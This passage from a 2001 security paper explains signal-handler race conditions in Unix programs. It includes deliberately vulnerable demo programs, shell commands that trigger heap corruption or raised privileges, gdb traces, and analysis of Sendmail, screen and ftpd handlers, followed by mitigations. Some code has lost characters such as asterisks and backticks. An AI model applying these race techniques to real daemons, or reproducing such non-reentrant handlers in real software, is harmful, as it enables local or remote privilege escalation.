attacker might cause sighndlr() function re-entry. This is a very common
condition - 'shared' handlers are declared for SIGQUIT, SIGTERM, SIGINT,
and so on.
Now, for the purpose of this demonstration, we would like to target heap
structures by exploiting free() and syslog() behavior. It is very important
to understand how [v]syslog() implementation works. We would focus on Linux
glibc code - this function creates a temporary copy of the logged message in
so-called memory-buffer stream, which is dynamically allocated using two
malloc() calls - the first one allocates general stream description
structure, and the other one creates actual buffer, which would contain
logged message.
Please refer the following URL for vsyslog() function sources:
Stream management functions (open_memstream, etc.) can be found at:
In order for this particular attack to be successful, two conditions have
to be met:
syslog() data must be user-dependent (like in Sendmail log messages
describing transferred mail traffic),
second of these two global memory blocks must be aligned the way
that would be re-used in second open_memstream() malloc() call.
The second buffer (global_ptr2) would be free()d during the first
sighndlr() call, so if these conditions are met, the second syslog()
call would re-use this memory and overwrite this area, including
heap-management structures, with user-dependent syslog() buffer.
Of course, this situation is not limited to two global buffers - generally,
we need one out of any number of free()d buffers to be aligned that way.
Additional possibilities are related to interrupting free() chain by precise
SIGTERM delivery and/or influencing buffer sizes / heap data order by
using different input data patterns.
If so, the attacker can cause second free() pass to be called with a pointer
to user-dependent data (syslog buffer), this leads to instant root compromise
see excellent article by Chris Evans (based on observations by Pekka Savola):
Practical discussion and exploit code for the vulnerability discussed in
above article can be found there:
http://security-archive.merton.ox.ac.uk/bugtraq-200010/0084.html
Below is a sample 'vulnerable program' code:
--- vuln.c ---
#include <signal.h>
#include <syslog.h>
#include <string.h>
#include <stdlib.h>
void global1, global2;
char *what;
void sh(int dummy) {
syslog(LOG_NOTICE,"%s\n",what);
free(global2);
free(global1);
sleep(10);
exit(0);
}
int main(int argc,char* argv[]) {
what=argv[1];
global1=strdup(argv[2]);
global2=malloc(340);
signal(SIGHUP,sh);
signal(SIGTERM,sh);
sleep(10);
exit(0);
}
---- EOF ----
You can exploit it, forcing free() to be called on a memory region filled
with 0x41414141 (you can see this value in the registers at the time
of crash -- the bytes represented as 41 in hex are set by the 'A'
input characters in the variable $LOG below). Sample command lines
for a Bash shell are:
$ gcc vuln.c -o vuln
$ PAD=perl -e '{print "x"x410}'
$ LOG=perl -e '{print "A"x100}'
$ ./vuln $LOG $PAD & sleep 1; killall -HUP vuln; sleep 1; killall -TERM vuln
The result should be a segmentation fault followed by nice core dump
(for Linux glibc 2.1.9x and 2.0.7).
(gdb) back
#0 chunk_free (ar_ptr=0x4013dce0, p=0x80499a0) at malloc.c:3069
#1 0x4009b334 in libc_free (mem=0x80499a8) at malloc.c:3043
#2 0x80485b8 in sh ()
#4 0x400d5971 in __libc_nanosleep () from /lib/libc.so.6
#5 0x400d5801 in sleep (seconds=10) at ../sysdeps/unix/sysv/linux/sleep.c:85
#6 0x80485d6 in sh ()
So, as you can see, failure was caused when signal handler was re-entered.
__libf_free function was called with a parameter of 0x080499a8, which points
somewhere in the middle of our AAAs:
(gdb) x/s 0x80499a8
0x80499a8: 'A' <repeats 94 times>, "\n"
You can find 0x41414141 in the registers, as well, showing this data
is being processed. For more analysis, please refer to the paper mentioned
above.
For the description, impact and fix information on Sendmail signal
handling vulnerability, please refer to the RAZOR advisory at:
http://razor.bindview.com/publish/advisories/adv_sm8120.html
Obviously, that is just an example of this attack. Whenever signal handler
execution is non-atomic, attacks of this kind are possible by re-entering
the handler when it is in the middle of performing non-reentrant operations.
Heap damage is the most obvious vector of attack, in this case, but not the
only one.
The attack described above usually requires specific conditions
to be met, and takes advantage of non-atomic signal handler execution,
which can be easily avoided by using additional flags or blocking
signal delivery.
But, as signal can be delivered at any moment (unless explictly blocked),
this is obvious that it is possible to perform an attack without re-entering
the handler itself. It is enough to deliver a signal in a 'not appropriate'
moment. There are two attack schemes:
A) re-entering libc functions:
Every function that is not listed as reentry-safe is a potential source
of vulnerabilities. Indeed, numerous library functions are operating
on global variables, and/or modify global state in non-atomic way.
Once again, heap-management routines are probably the best example.
By delivering a signal when malloc(), free() or any other libcall of
this kind is being called, all subsequent calls to the heap management
routines made from signal handler would have unpredictable effect,
as heap state is completely unpredictable for the programmer.
Other good examples are functions working on static/global variables
and buffers like certain implementations of strtok(), inet_ntoa(),
gethostbyname() and so on. In all cases, results will be unpredictable.
B) interrupting non-atomic modifications:
This is basically the same problem, but outside library functions.
For example, the following code:
dropped_privileges = 1;
setuid(getuid());
is, technically speaking, using safe library functions only. But,
at the same time, it is possible to interrupt execution between
substitution and setuid() call, causing signal handler to be executed
with dropped_privileges flag set, but superuser privileges not dropped.
This, very often, might be a source of serious problems.
First of all, we would like to come back to Sendmail example, to
demonstrate potential consequences of re-entering libc. Note that signal
handler is NOT re-entered - signal is delivered only once:
#0 0x401705bc in chunk_free (ar_ptr=0x40212ce0, p=0x810f900) at malloc.c:3117 #1 0x4016fd12 in chunk_alloc (ar_ptr=0x40212ce0, nb=8200) at malloc.c:2601
#2 0x4016f7e6 in __libc_malloc (bytes=8192) at malloc.c:2703
#3 0x40168a27 in open_memstream (bufloc=0xbfff97bc, sizeloc=0xbfff97c0) at memstream.c:112
#4 0x401cf4fa in vsyslog (pri=6, fmt=0x80a5e03 "%s: %s", ap=0xbfff99ac) at syslog.c:142
#5 0x401cf447 in syslog (pri=6, fmt=0x80a5e03 "%s: %s") at syslog.c:102
#6 0x8055f64 in sm_syslog ()
#7 0x806793c in logsender ()
#8 0x8063902 in dropenvelope ()
#9 0x804e717 in finis ()
#10 0x804e9d8 in intsig () <---- SIGINT
#11 <signal handler called>
#12 chunk_alloc (ar_ptr=0x40212ce0, nb=4104) at malloc.c:2968
#13 0x4016f7e6 in __libc_malloc (bytes=4097) at malloc.c:2703
Heap corruption is caused by interruped malloc() call and, later, by
calling malloc() once again from vsyslog() function invoked from handler.
There are two another examples of very interesting stack corruption caused by
re-entering heap management routines in Sendmail daemon - in both cases,
signal was delivered only once:
A)
#0 0x401705bc in chunk_free (ar_ptr=0xdbdbdbdb, p=0x810b8e8) at malloc.c:3117
#1 0xdbdbdbdb in ?? ()
B)
/.../
#9 0x79f68510 in ?? ()
Cannot access memory at address 0xc483c689
We'd like to leave this one as an exercise for a reader - try to figure
out why this happens and why this problem can be exploitable. For now,
we would like to come back to our second scenario, interrupting non-atomic
code to show that targeting heap is not the only possibility.
Some programs are temporarily returning to superuser UID in cleanup
routines, e.g., in order to unlink specific files. Very often, by entering
the handler at given moment, is possible to perform all the cleanup file
access operations with superuser privileges.
Here's an example of such coding, that can be found mainly in
interactive setuid software:
--- vuln2.c ---
#include <signal.h>
#include <string.h>
#include <stdlib.h>
void sh(int dummy) {
printf("Running with uid=%d euid=%d\n",getuid(),geteuid());
}
int main(int argc,char* argv[]) {
seteuid(getuid());
setreuid(0,getuid());
signal(SIGTERM,sh);
sleep(5);
// this is a temporarily privileged code:
seteuid(0);
unlink("tmpfile");
sleep(5);
seteuid(getuid());
exit(0);
}
---- EOF ----
$ ./vuln & sleep 3; killall -TERM vuln; sleep 3; killall -TERM vuln
Running with uid=500 euid=500
Running with uid=500 euid=0
Such a coding practice can be found, par example, in 'screen' utility
developed by Oliver Laumann. One of the most obvious locations is CoreDump
handler [screen.c]:
static sigret_t
CoreDump SIGDEFARG
{
/.../
setgid(getgid());
setuid(getuid());
unlink("core");
/.../
SIGSEGV can be delivered in the middle of user-initiated screen detach
routine, for example. To better understand what and why is going on,
here's an strace output for detach (Ctrl+A, D) command:
23534 geteuid() = 0
23534 geteuid() = 0
23534 getuid() = 500
23534 setreuid(0, 500) = 0 HERE IT HAPPENS
23534 getegid() = 500
23534 chmod("/home/lcamtuf/.screen/23534.tty5.nimue", 0600) = 0
23534 utime("/home/lcamtuf/.screen/23534.tty5.nimue", NULL) = 0
23534 geteuid() = 500
23534 getuid() = 0
Marked line sets uid to zero. If SIGSEGV is delivered somewhere near this
point, CoreDump() handler would run with superuser privileges, due to
initial setuid(getuid()).
This is a very interesting issue, directly related to re-entering libc
functions and/or interrupting non-atomic code. Many complex daemons,
like ftp, some http/proxy services, MTAs, etc., have SIGURG handlers declared -
very often these handlers are pretty verbose, calling syslog(), or freeing
some resources allocated for specific connection. The trick is that SIGURG,
obviously, can be delivered over the network, using TCP/IP OOB message.
Thus, it is possible to perform attacks using network layer without
any priviledges.
Below is a SIGURG handler routine, which, with small modifications,
is shared both by BSD ftpd and WU-FTPD daemons:
static VOIDRET myoob FUNCTION((input), int input)
{
/.../
if (getline(cp, 7, stdin) == NULL) {
reply(221, "You could at least say goodbye.");
dologout(0);
}
/.../
}
As you can see in certain conditions, dologout() function is called.
This routine looks this way:
dologout(int status)
{
/.../
if (logged_in) {
delay_signaling(); / we can't allow any signals while euid==0: kinch /
(void) seteuid((uid_t) 0);
wu_logwtmp(ttyline, "", "");
}
if (logging)
syslog(LOG_INFO, "FTP session closed");
/.../
}
As you can see, the authors took an additional precaution not to allow
signal delivery in the "logged_in" case. Unfortunately, syslog() is
a perfect example of a libc function that should NOT be called during
signal handling, regardless of whether "logged_in" or any other
special condition happens to be in effect.
As mentioned before, heap management functions such as malloc() are
called within syslog(), and these functions are not atomic. The OOB
message might arrive when the heap is in virtually any possible state.
Playing with uids / privileges / internal state is an option, as well.
In most cases this is a non-issue for local attacks, as the attacker
might control the execution environment (e.g., the load average, the
number of local files that the daemon needs to access, etc.) and try
a virtually infinite number of times by invoking the same program over
and over again, increasing the possibility of delivering signal at
given point. For remote attacks, this is a major issue, but as long
as the attack itself won't cause service to stop responding, thousands of
attempts might be performed.
This is a very complex and difficult task. There are at least three aspects
of this:
Using reentrant-safe libcalls in signal handlers only. This would
require major rewrites of numerous programs. Another half-solution is
to implement a wrapper around every insecure libcall used, having
special global flag checked to avoid re-entry,
Blocking signal delivery during all non-atomic operations and/or
constructing signal handlers in the way that would not rely on
internal program state (e.g. unconditional setting of specific flag
and nothing else),
Blocking signal delivery in signal handlers.
Michal Zalewski
<lcamtuf@razor.bindview.com>
16-17 May, 2001